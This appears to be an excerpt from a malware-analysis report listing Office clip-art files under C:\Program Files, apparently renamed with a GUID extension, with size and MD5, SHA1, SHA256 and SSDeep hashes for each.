SSDeep: 384:Dkbm3gGv+lKt5fPwSgN6wgMKB+9SmFMWi5NnDS/jyJJ9lvelEyWcFbu5r8/YsABr:DOWgydt5gSgEw3m+km2Wi5RDGjYJXmCV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.84 KB MD5: 67c498191ddadf6b3276cdf3cd05ad20
SHA1: 1648146b1592e938860742e9e8e7504c62f3ccf1
SHA256: b12ec3f6e53f827011277679eb46d14f2a8ae81c611984550a9cc3e509c624d0
SSDeep: 384:Fxy0PiW+s1NuL+wxCRoZ/Drx2wwTHbq2BSJAy+44XxHD6qdCLoGRZr6LpxFXy687:Fxy0Pits1NuL+wxCRK/DVAbbq2BSJAyP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.66 KB MD5: d50b5333cf4ad8d488622ca992b0bbf2
SHA1: 65e8a6cfae3a189ab4efcfbf04554a0463d2e890
SHA256: 0918d02a0b2ada41371e125df567ead26b2931274408e5ef0c72e7823d7f461b
SSDeep: 384:0YDhGzoce9YyyIFoCHzkKG2gEAQLTGgR7F/6wBe2m/ZEuzTO8+imbEAEPBYZUm6J:0YDhGz5KyIFoCHzZG2gEAMTGgR7FSwBo
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.91 KB MD5: 2acba3b7ab350b1920eaa289fac8eb5b
SHA1: 4f9138f9bc1ada39cbc1aebf4f2311b6ab2443c3
SHA256: 02b769907ffac6df4191463ef03f73915e7c74cedddd21ae89017f696f019292
SSDeep: 768:MZJBT6LY0UKE+E2DaRX1Dd9GJiGF39mqGoQTp9gmQjwxdrS9ZF9cxsGQg5U168wR:y9jrzeqObLJmf59
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188679.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.85 KB MD5: a80308bdb2e3df31365191857c09e9c3
SHA1: 152cf898ce8c0f9a85bbd94b85bed2a076971f76
SHA256: e53c9b09f8eb2f111e5b458b2220b888fec5c39c355398987a895dae1d100c24
SSDeep: 384:Rf1R8EtRl17GnfuCc7UqHjp+eEdfrZYegT5OrYYxUJY9aWGm0jzG6SXXXcPOo16T:Rf1R8EtRH7GnfuCc7tjp+eEdfrZYegTO
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.16 KB MD5: bb51d30b47bbb81cf3625ad9bd8098c7
SHA1: 21ae8d334762b8dc4f8566c6acdb5b1a657afcbc
SHA256: a1d230521fb5063be7d24620938e529f3b193e6188d5482146f68de600573a6b
SSDeep: 192:WNUY6oPZWsRkamb8A0zO5lqK+ciMHl4gK+W:WNURQRkamb8TzGlsciil49+W
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.12 KB MD5: db26bb829642dd2efdad4ccb5fb411ab
SHA1: 62ef07b2877c193520308c146e67a294dfde5f63
SHA256: 56559c45e7651e5f04220a370786bcf9a4f1aeae586349f543b8a3fcf40c58b0
SSDeep: 192:W9eQLSmMPv2Upnq0twZTV+1rXxTYhlzbps3MlH2jUeRjvSlUyh:W9eQLSzv2UQ1V+19TYhl/hGRjalUyh
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195772.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.59 KB MD5: 02be701c4512c1867580dbb506d21ab2
SHA1: 9f8462172ead3877a4f53f078075d5c72dcf958d
SHA256: fc0a999983f9b1d8cda873a599a9d6cb4a4ade7dc97a6282adcc24dfe988cd55
SSDeep: 96:DZ2Yy5V/zyZyFqyq7qKAPOoZzCv64FMFXt1oELxhLT8hYzQGxW:V2YAVbIUqZ7qKGOECxiFHoELxVTiy7A
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196060.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.64 KB MD5: adc02b3bd0d44cb8c01dc7ec9394e421
SHA1: d05cf1ba45efd44a5aeea7febf1267e26cd98b83
SHA256: 745c527dae1cfa28c22e2e2572e32b890d50c29790b71714c5c1624b5cb2720b
SSDeep: 96:imtbvRYxpMgW59hzvL9qu7JZjgcV1wck/tALO8UHVVBDnRzauri4:nPH9h7J9BVV1+/eKP7pnlaul
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.20 KB MD5: 26f275599d545e1ec4607f7adcf0204a
SHA1: c408867c9bf62609b74794cdaa043913db4c86cc
SHA256: 03ca13d4e361c92263a51e721e59198d4a8f273de62fba7617e9807e04b28219
SSDeep: 96:N7U2h26k5DcJAk5o+hvKymMZawOZsVXkkX+Io5/2zC4vJKEPsD3+AMcV6GZ150nT:lsH55ky+hzZa3ZshkU+P5/2e4+3scEGQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.75 KB MD5: 46be4cac7ea5e753fe016780d7fe1154
SHA1: 9cafadccda10409897f02ecca0409a251c759e38
SHA256: f7d057718c95adb07474c94c69609be9f0092fa2604000aa6c43569bff96c725
SSDeep: 192:zMKztlmX/q9fNnqWic5SqCsqGod4ELN0+:zMKz3mX/q/nttesqGW4ELNZ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196364.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.58 KB MD5: f29ecb4b8876b7178bd724567e757f14
SHA1: c4d2d89c4edf7478f4ba4a6915d3f0670ff0e61d
SHA256: b7bdb765c077f3be44ce7c6e986a014e23728430853e12d43563feb895824d7a
SSDeep: 96:bQEKy2+C/FiGPc9V0wl/X1rb5u50ErXbfUNZK8dCLuQdaAFh1SgPUbKJk7wWn1T+:bip+0i0aVj/lrb5rdK1uQVhSgCOGw41q
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.17 KB MD5: 81de588dd59a58f5a501893c0a730afc
SHA1: fb8e59cbea629de95dee95687200d7af13a6dd76
SHA256: 511a8aa264e6ebffb5f6c82a97aa43834dd9e16c9ffd211e624b918b4059d362
SSDeep: 384:DDoKZ+Cv1OKdbz0ZrejLbyS7oOkCjd03EWIHqIAacaE7xsqkWgAkwadCkSt:DD/7OKOZre33oOAEWIbAacaE7f8Xl8t
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198021.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.09 KB MD5: ee01cf48c286c402809d5c9c1c32340c
SHA1: 0096158524e946d958f9181f1cf23fd77eb06907
SHA256: bd27b2c70251924f7dff188787bdedbb623bfad5f86a7daab8937497b6af755b
SSDeep: 768:EtC9GvH5T0Vj0WrUEdvvlMLQrBWcMXkNHvfpBQR:0CeH5Mxz9MkrBJh3DG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.20 KB MD5: 7a6cae80d538d7cc7a1562a70453a95b
SHA1: 25dce15f501a2ad561d6bb51b4975f95b15fcaf4
SHA256: 199145c89063617f190b88d13716bf01d92c5dd1fdad9faee6c405638beecd6e
SSDeep: 384:HJGr5HVvPkv/3VLp4jtjHqlskMLgKBbXy:HJC5H1sv/3VladOM6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198113.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 41.28 KB MD5: 4581ce38608a77a74da1741330f4a450
SHA1: a892a8b46dd64a52719b4023cdec432b7fa9f433
SHA256: 05644eb04c3e7acb875da3ed0736b7c3794df307947497aea20a7cd8eccde384
SSDeep: 768:texSnjR4IBYTk7h43g1HmsNjoz59+nT5BJVZhpBFgkrDr7T9pOxv6:pnF4dTaHYqlvPhpgQT9pMv6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198712.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 56.37 KB MD5: 6dd80e520b6318d0d29e4414fc0296b0
SHA1: 42bcf68efa1293edb9117db44e6f17e7ddc9c857
SHA256: 594be0868cc19a392a35f2e3485c2f3dd4dd082bc2199e08847435aec207f1ef
SSDeep: 768:LZjXryJUr5lMsCjPrzotTsPDQrdYVg9y869m2aV1I2NwbOSo7chzwcWF/+3:F/SUfMsC0xs8rdYB869mJjIywy4S7F/2
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.33 KB MD5: 523c722fc213f7993ce318cdbb10f269
SHA1: d3c557ca6996a33bfefde3a3102309774bb28e6b
SHA256: 82cff38994b9334b0c202abbc6e172b2acf991ec72fcc3701fb51a40d0ae3478
SSDeep: 768:kgvtRW4kI888AP3RnMKYiFvIChAKp2bukM4:P1krIhC6IW/S
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.80 KB MD5: 03aa068d5b0500b8d1e59b7b8144a7c1
SHA1: cc078356d332701f3b15fe69467c76f5fe2d7a92
SHA256: 07bd6f6f51dea5042680511f51f605c62e2024f3e882eaa5b26309015241bab8
SSDeep: 384:F21F1hYs5ZLwE5FUFBWf0ai18JKc4BYMS0xfWN2Ez8BtzEfPl/pJqjWbaj2QFE85:F2VhYs5xwE5FUFBWfRi18JKc4BM0xfWw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107300.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.40 KB MD5: abc367e9233859518e8f6ca53416bbc7
SHA1: a4cf9ab5cd4bfc6a5d792e66540ed7af1101a8a6
SHA256: c9b651d8a974c0a6235c651186723bd381e2849b62df37b91263de2322d3036b
SSDeep: 48:1hLiaB4gYT8FFVXLge2yEcTCVMnB6aWOQGBkkb1No3zQb8RgbW:/5JFFt0e28uVUB6BOQGTxNo3zEAgC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107314.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.60 KB MD5: 25e267c3b96b0cb371f7a34723b9c00a
SHA1: d0faaa7774f9442ed637e5355c103b37eded30fb
SHA256: 265ec135611e6569739ce8c8baa64db75115aff099a2c95fcf3159ee343f67af
SSDeep: 192:c0VnRlpoZodzANMTqnikO4jv7QyEEeaWFw7DnR1miVkyMk5vB2KH8tscaU+ICner:bVnRlp8OANMGnibev7QyLeat7DnTmieB
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.15 KB MD5: d2eb0ddc972feabfa42c0b61b788685e
SHA1: a9c6076cb4f3dbc25a6613f501c805c942f32f81
SHA256: 33ddee5a114de837b7f20b630e39ccd0865b9dc2286a038c997a01a195ddf00a
SSDeep: 96:f0JATtpyhvGekP6nZmW3a8Eq/eJF0CewgHteQu+6kJIMIacznYi:iABpyhvGeXnA0nEq/eXEwgNeQusIMIfn
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107344.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.96 KB MD5: 28c571583acb96ba574606b8fcb2d214
SHA1: 45b221d81c8a3afe87c4cb7d0dfcef4b122695da
SHA256: b634a8a90f7d6e33814562921df2c79216c1c22c920d6854db43552cbae91083
SSDeep: 96:rJTW9/hZuqLZIPsZ/LsgBOwS3yf5Fxz+H7YtbnzXFuS/E0kxemRaax:tTeh0qLZIPA/LgwS3q5FN2mnzXkS/EJ/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107358.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.78 KB MD5: 1ef7bc314b433958b762398456ed388a
SHA1: 732d425d80074e30ca13fd645362fc5ad83f63ad
SHA256: de77cb3c495d168ea80b6256d7e64c0f7c253599bcf0196589966f24fcbc734d
SSDeep: 192:zUmZYHcSlAAhf2qCsjpiouc/NG/k70O7LrwggP2BZiG6+ysBzcG3kK:zUmY8SlAAp2vsYfING/JO74gHZa+ykz/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.97 KB MD5: 6f13f2284500bd47ed0bf23fcaa0f7a8
SHA1: eef797b0d2642158f6af3471ccfb445871ac8408
SHA256: a0dd55bbf53e626910223c5c3d9a1f987228df74bd1e499d752cbb9d4a6ac281
SSDeep: 48:1xTJB4gYT8lXeSV3H1knOaYlpB9AYg/21QL6FdiEdiYTlrwjpgKTpXxLJdUU3yrW:/T5JxeSV3in4BKYC2KL6Fd5i0ILTpXxT
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.08 KB MD5: 9247f58070d51761a684f8bb56d26ac8
SHA1: 46d21c5cdb7d9b1e2649c49705bedd2ecf52f247
SHA256: e21264dda6d2ae08598653fbd1852f9e3e0e9c2608eb7868d6e32bb2109152aa
SSDeep: 384:aGUMrePgD+pn3unFxlGGQ4gWRfWxIvYZW/bE7uj71Q8WAotZUbiKKF8IU3y5swY4:aGUMrePgU3U24gWRfWxIvYZW/bE7uj7y
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107492.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.70 KB MD5: da0167f66cb57c20c5bebfdcf957c899
SHA1: eecddfe27b8512211f93fada2550b40fca9f5c54
SHA256: a4e6eadf227de58304edfd88adbf26eecf739d5c49db7fc41d7f0b40ef1ca088
SSDeep: 192:YBkTeQOhnNlt3qcXub6hvjidWqSHRoYLn1TzGnvObFFTeBVTNAS1aMpVcEFFG1iL:YBkiQyNO+ub6hvjidWqSuYTxzGnvObFY
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107496.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.66 KB MD5: 20cc43b3c931aa375fc2bf1b1806f8ee
SHA1: ce5361caed2368b748cb8568bc4d6f5ed64177bd
SHA256: 38367b52da0775dc1ba493631c040cd6b1b916b67ce3ff94f96136527cd5ab5b
SSDeep: 192:OSG1UDj7+bw7AgnZn9lRUYMFTxrPA3AoHL2nKbHPmJ27qZyCvdC8/xP2CQzWEV8X:OSVj7+E8gntLRUYuTR4Q42nKbvmJ2mZl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.10 KB MD5: 64901e11e214c509ea7cbc29ec336872
SHA1: 862d22352952a93be32522be6c3431ea303689af
SHA256: 5455a73a69cd53baaca1bd284eb53a7b0001b0b1efa522e7c6429ee0003fd39a
SSDeep: 96:VJnAHgvBWqLQyX0GyXR9Og76GzYM1UwgLkcKbW6PaXs:/nAAvNl0GER9V6wYM1UwgI5bW6Pac
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107514.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.92 KB MD5: 42f189bc270c0030b7de065404eb420e
SHA1: a9886961b2b975c15019bee4b4f399791ff4224c
SHA256: 6294f9f78e527a3907c636d97f1f6c2d69a802c82f170ab80b10f2265e51d5be
SSDeep: 192:mp/Ceguizbuki0ZS5dpKJ0NVSVJ1P/gSAhe204cMW6hY3tY2WP7q94XjUM/BWgF2:mp/C1uIvSLweN4VJ1HgRhe204cnax5Pa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107528.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.63 KB MD5: ce628bdb6a59478af605ad56538e6174
SHA1: 7338072f778660648366c3834bea29b68454bacb
SHA256: bf0e95c029cd5c5990096133bd27f47ee076bf8de0e43d92407518d396c10de1
SSDeep: 192:ZQrcl9+0pmtiVWbO7O90QwSyOKLAjOuDP/HTdSg462hsQEMB5S/iZhxJ85J:ZQre9+08GSOHNSyOKL4OK/HTdSg462mF
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107708.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.70 KB MD5: 5b963cb2eb1e3967124d0304800ef96b
SHA1: 11115a4693e185d8174f8d11101f36c5b42b8786
SHA256: 7854c8e09e6a6a66373f6b215a6690e20bca1d5c738bfba965c8c5bfb1fc012e
SSDeep: 96:OJMyJXl2RHCCTp5QNcsXdT9fyuvbbt9uqU59flOz5WQ4Ssv:EMs2nTp5QNcsXdR6ut9uqU59flO1WNSA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107722.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.07 KB MD5: 4ee5d839479dab65a711317e5322ea8a
SHA1: d1605f2636ba62cb955d7ce11d8b9e2cbff2d305
SHA256: 876f419d4561ec2ad0d2814fcb7c3d97a8af0b5f51f3f0a42513cc3d9e3ba1a0
SSDeep: 192:em82uhwGXgWxtv/NOEJBks68uu9LDtwhQN5seX/jaeVswHuSvld8TSvEKdzBrpax:e92uhXgWxt9OE3ks68dw+N5s0jrVswHU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107724.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.85 KB MD5: 75a70041719c779fa86539f6063bdb18
SHA1: 4fa345af48040d62e55cb1338f0e0691382eb424
SHA256: 1fffbc0b397b7637f41542678b4c3022c6c145bbcc3ab31988bd845310df75f5
SSDeep: 192:HfEdB4sMwSdp58dKJd6sJS4q5colk8dxlQ1Ycb/aYQ+BinApTSSEd:/EdB4sMwSd78dKJd6sJS35tk8DlQ1Yiw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107734.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.07 KB MD5: b44d8ecace13baca6764bb58c03b3325
SHA1: 227814004623bff0ee19471b16cf2b65c7818d8a
SHA256: 3a91efac49465809b7a0f70613749722781ec3b9be801e22ca664c976d1f838a
SSDeep: 96:YJsV7N75dCR1z+CUdePwfjJJBk1tAvJizB/HoAy:+sV7FCyZpjnBkovJgBwr
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.03 KB MD5: 30d48ec00649ebadb258aeae7957676d
SHA1: 21ccfe601342c380ebac6e0251016bb005c7298b
SHA256: b3b19e29a66f578e514cd363ffa9eaf8e5ce46963a82941ff9fd47de99adb8e0
SSDeep: 192:dAxe6y8AGYfIopyt4/SBWz1sXcaEaJQf8WLAMXB15kbhR8vOWAYcPRyld7RKW:df6y8ALfjpyt4WGGMapW0qfXf5klR8vB
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0136865.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.32 KB MD5: 7ba521934c7cc9f3f088ac6c05b43f51
SHA1: 281cfef97f95ada4a9ea1f449efa86d2cec972d7
SHA256: b8eb3ecdff39e5e590a1d24a186daa30e5603c4a67424b51f29e1e76e2f3075a
SSDeep: 384:tK68csGyICQYwtwUP9mYXpuRw605mI0y3ZK:tK6ppCKtpPEupuRB0pvg
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 39.29 KB MD5: 7bd43b35fc14c73347a857e1670010bb
SHA1: af7c54c38dd6b83c0a9ebd5a00fa3cb05383fa80
SHA256: 803c3b8f752fb280c639bdebf25adbc36b5896d97cd69cd129e76cf5503aab91
SSDeep: 768:s1YqmpAw9e2LaSGinuPBwEw3EXf0pKOIWgYZm9BS0PFWv6ITMCx:sGqPw9oSGS3EwSfqpIWOOmRaMa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.45 KB MD5: 1aecd4e04a40ef8ebb3a348b68ec496d
SHA1: 555ec7fb35ef85c33745cf6a69709c1dc2261342
SHA256: 235db5a13f61cbf316d0091815202d81b04aeccccdfc01480e901bb811b9e89d
SSDeep: 384:cQemEStq7UHClydnC8k+P8ay7uQ7Q+14XCcBW:cQ/98oXlLPi7/7WdBW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 31.10 KB MD5: f67fd4abbea7272f218bba2256337f04
SHA1: 9bb992f3fedb3ac0c2c4f68e7539fa4653a3076b
SHA256: cb5d78c7686721113af934bf92bc92019f5e1bb67fe50ac132c55b81030536d6
SSDeep: 768:lo+et8YQumate7HJ/QZQg7VdKdG0X1viftlxQw5qRY2MXm3FZ6gibI:lretvst4LynviF3Hl21dik
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.59 KB MD5: 577815f286156dbdd3bb9ab567980413
SHA1: dac0f14db5a06321ffd14b13d44a5ec15679963d
SHA256: 28e36445c3b26ae27b77ca84001870fa6ae7d881b0e331667087b0c451c36e6a
SSDeep: 768:aVYyOTdDHTnJk8nhg/X4epV66x2sDkTd2p1azJbeW0ZqaZcx8vW:mK5Hjjnu/XVp8MDkTCaNbe5ZYb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 38.62 KB MD5: df67282233a5eef618ce898174493eee
SHA1: fcb164371342e70fffc61d07b9d2648b50e40123
SHA256: fe099bb15227c9cfb5ab87959e9e1f1c2c0ed36531f053e0e0c48fa838b1573f
SSDeep: 768:7zB1RP3NT+eOEs4bNaQgk0kKlTf12raYEtCWnXV2IzvqnEjh7aKehe1Syg0MR:7zB1VKEs4bNDJKBN2ZEtCWTzSnEtafeW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 37.34 KB MD5: f240864d65a238cbbc5bf4f1b5507ae4
SHA1: e5f4bfca86c4f4dd99086d12495051490a24922e
SHA256: 4eab342e3bfcf60521a872b0ecaac34b3552b190cb004a90e78387920f17dfcf
SSDeep: 768:WWiZ7ZETkaahRufZ+5iAK6luLGXot0f+OiE79b0WZrim8r5:WWiNZOahU6suoC+OL79b0WZrqr5
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 26.75 KB MD5: 267a10d69eb167a484b8d061cca9ce54
SHA1: cb053deb0afcab58fe6a4fec626723a577068c26
SHA256: 260a29f926718feac2da766f4747cf4454b2d0b611bd4097e85b782f999a2b54
SSDeep: 768:UU9AWDl+EsRJMXGgdKSnWwrcJgFc3g5L1woJM:UUtJ+xy2oEwISc3YL1wAM
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 64.75 KB MD5: cc6bf2db689692328fe52d85bc50972c
SHA1: 428b7a08ef5a6928e6c1847195a5a3ee023f8510
SHA256: b5bce62d42e4ccee30aa2db008ef5248a6171c52ef181b437fcfe978e88b6a55
SSDeep: 1536:TrcLtRn6nRGz++MFai4KsZ+J/nMIshUVEAhnIG7lfh3540OPHBELE73C:TkD6sMFasI+J/YhU57NKN8
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.30 KB MD5: 1b66daf4bca48dbd20b2f3116a0ae071
SHA1: 51ecf43b2832a7240c751e4bdd2caec9672a7845
SHA256: 7119e5ea01a50a5f613622d886976cfd807a3be49456a658fd3d2a2db1645e43
SSDeep: 192:gaP15UMtS1TZGQV0sf1E4p8TbTUTMT1TSTCTgT3TtvTWiqTnfSlw95Fe51uvdQzW:ga95/OGQV0sf1fKvQAZmGszJvCiqbuKr
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.10 KB MD5: 3270cbe5489eeef74a7073ad8f3fa3f1
SHA1: 9fc2401e1bd3e19c36a502a00c50ea82d30dcb54
SHA256: 54e2808c0d0b1712741b54408d890281fdf4cc81daf2e569fbcc76c370e862e2
SSDeep: 384:2iuLCHn8RD1ldU4eEeV/FmwKaPShaKIwQDg1byKm6D5u53+CA6RrBQJDq8ZkZb6i:2iuLCHn8HldU4eEexFmwKaPShHXQDgBw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151047.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.07 KB MD5: 819b5916b6ffc02747c899cedb88ab18
SHA1: a6a3f78a4161df02cff321d642e2e95793148721
SHA256: 212508efed132ea8b4ecb4b4ca81b415638ca92b9a8240ddaa30ed2d29667a4b
SSDeep: 384:kHI4MMeS/KCzteQ322sgPEkCW5Z31efH3HD3mQjR1xU6m8IG6r8xD60nCZ8bRKvf:kHIxMeS/KKtJ32VrZW5Z31IH3HD2Qjri
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151055.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.29 KB MD5: b70f7083e482670f07761b3eba4f7653
SHA1: 8656e17ebe87e25438d59175416eb5ab3a002078
SHA256: 2adb0bae434d01991c3358618bd868189a92d570adb2f895796958c0d8a7c3d9
SSDeep: 384:tIeoAEIA+SolPWqrR6sGkQBMf3h0v0rzItdo3wSTxXGi9lS0UfEMfiht+qk+4JZl:tIe1Ed+1RW4RJGkQafhitdoBTxXGi9kt
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.90 KB MD5: 4abdb70b1565a5b99c3a0a811b8005fe
SHA1: 5c9d8732c0e2c27ce1d4bd42ad4db85e32518738
SHA256: d17ea9af9d32bcd29b9692f3405240c579cad030944ee614aa3295412088ead8
SSDeep: 384:XiF8jWNiqCmIdgO6u3ES1bcOMcldt/QoHswhmJ/c2FsoklgelzBuYcv:XGacfZIdgOh3ES1bcOMcldt/QoHs+mJH
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151073.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.02 KB MD5: e192d23afa614af9da07f7026f577ff0
SHA1: 7d5682c665ed20debcc9786252452a632036ac6e
SHA256: 90252024635e0080a78002886e03e1d042fb3145c47f43848c8aed8f8dcb6ad1
SSDeep: 384:krTnE92wSMl7iOILFvYLcvBfEwAyShjhlbG3gfGP:krTEHSA2OIvycvBfpAyShtli3gfGP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.80 KB MD5: 8510fa30a4c1f846858af745ede11d31
SHA1: b4b851862579fe5651f4f78dc440441aa0aad90f
SHA256: 5aa2210b7053c599f442d4584dd3955214e88af9ad95d98913b0ecb816ec42a3
SSDeep: 384:C60BgxajtAjPUugXodsDm4g9Ri4gBbovuua2+PWbAt0hGm1oVxJKJa2ncZgkW2+h:C60sgerUu8odsDm4g9RiJBbcuua2+Pi5
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152570.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.29 KB MD5: e78c9b7c2da95ce9c203b49d7b637441
SHA1: ef4f93fbd7292e947560d00276bdc1577264a093
SHA256: 329141035fee17d74a76cfc973a9466685dc272e872469145fe89844672c52dc
SSDeep: 48:1KB4gYT8SRwNsg0GPItGGCNtg+FtAusLYpBLNqsJTPm9haEFFj4YMrW:iJaymGxtgEtsLYpBBqWTO9hVFB4+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152600.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.54 KB MD5: ba88d3161c20b9468ed14476f77a0e0f
SHA1: 5f97a5d3b79cba3266cd0b6f330b6b52f84df49f
SHA256: cd5e178a1b0b01a83375a303fdea51f269234e1c64f7d7674b0e7e5586bea1b8
SSDeep: 192:hIlTrwgFoutRvANb3iOg55SFn9h7Ltovs7fNowMzhVRFDU2d2y48VwvguNpvrbVL:hkTrDFouTvgzagF9h7LtQGNowMzTRFDA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152608.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.15 KB MD5: 2ad568972c50977765b486541f2f0f02
SHA1: 5064dce9110a633bd6f11a206fcc3420bfd3e438
SHA256: 8549a6a335d71781d105b2250111d20e09535c0bc1e5dc0723445b2af46ee9a9
SSDeep: 384:3tLbjHfRsXGMhnIkkFpVEFCu2H40F3+T+vKB8mEFp8R9nRrtrLjNvTgl7bgoE3:3t3j/iXGMhnItFpVEFKY0F3+TGKB8mEG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152610.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.82 KB MD5: 7303d6651155dfb47159a94c029c5550
SHA1: b7f0ba1320845f6d892224bdd316e69e2830a8e3
SHA256: f6ef1dc3ec495d5def0c22a207a28c2c63843cdeb8f1138985134a71369566a8
SSDeep: 96:NJlZIAL0Q03bgpjK+qsSqrLXf0m4ipA1uTbJFggo/FJtaC/T6:HlZIk0BgpPTtrLXfN4iy1uTbJFFo/FJ+
False
